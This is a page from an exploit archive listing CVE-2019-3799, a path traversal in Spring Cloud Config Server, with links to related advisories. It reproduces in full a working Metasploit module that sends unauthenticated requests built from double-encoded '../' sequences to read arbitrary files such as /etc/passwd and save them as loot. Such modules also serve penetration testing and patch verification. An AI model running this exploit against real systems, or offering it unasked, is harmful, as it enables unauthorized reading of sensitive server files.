Spring Cloud Config 2.1.x - Path Traversal Exploit

🗓️ 01 May 2019 00:00:00Reported by Dhiraj MishraType

zdt🔗 0day.today👁 42 Views

Spring Cloud Config Server Directory Traversal exploit for versions 2.1.x, 2.0.x, and 1.4.

Reporter	Title	Published	Views	Family All 25
BDU FSTEC	The vulnerability of the Spring Cloud Config server arises due to an incorrect path name limitation for the restricted access catalog, allowing attackers to expose the protected information.	11 May 202200:00	–	bdu_fstec
Circl	CVE-2019-3799	26 Apr 201914:45	–	circl
CNVD	Pivotal Software Spring Cloud Config Path Traversal Vulnerability	17 Apr 201900:00	–	cnvd
CVE	CVE-2019-3799	6 May 201915:21	–	cve
Cvelist	CVE-2019-3799 Directory Traversal with spring-cloud-config-server	6 May 201915:21	–	cvelist
Exploit DB	Spring Cloud Config 2.1.x - Path Traversal (Metasploit)	30 Apr 201900:00	–	exploitdb
exploitpack	Spring Cloud Config 2.1.x - Path Traversal (Metasploit)	30 Apr 201900:00	–	exploitpack
Github Security Blog	Path Traversal in Spring Cloud Config	23 May 201908:39	–	github
Metasploit	Spring Cloud Config Server Directory Traversal	18 Apr 201907:24	–	metasploit
myhack58	Spring Cloud Config directory traversal vulnerability, CVE-2019-3799）early warning-vulnerability warning-the black bar safety net	19 Apr 201900:00	–	myhack58

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Spring Cloud Config Server Directory Traversal',
      'Description' => %q{
        This module exploits an unauthenticated directory traversal
vulnerability
        which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring
        Cloud Config listens by default on port 8888.
      },
      'References'  =>
        [
          ['CVE', '2019-3799'],
          ['URL', 'https://pivotal.io/security/cve-2019-3799']
        ],
      'Author'      =>
        [
          'Vern', # Vulnerability discovery
          'Dhiraj Mishra' # Metasploit module
        ],
      'DisclosureDate' => '2019-04-17',
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(8888),
        OptString.new('FILEPATH', [true, "The path to the file to read",
'/etc/passwd']),
        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
      ])
  end

  def data
    Rex::Text.rand_text_alpha(3..8)
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
    uri = "/#{data}/#{data}/master/#{traversal}"

    res = send_request_raw({
      'method' => 'GET',
      'uri'    => uri
    })

    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    vprint_good("#{peer} - #{res.body}")
    path = store_loot(
      'springcloud.traversal',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end

#  0day.today [2019-05-02]  #

01 May 2019 00:00Current

EPSS0.91358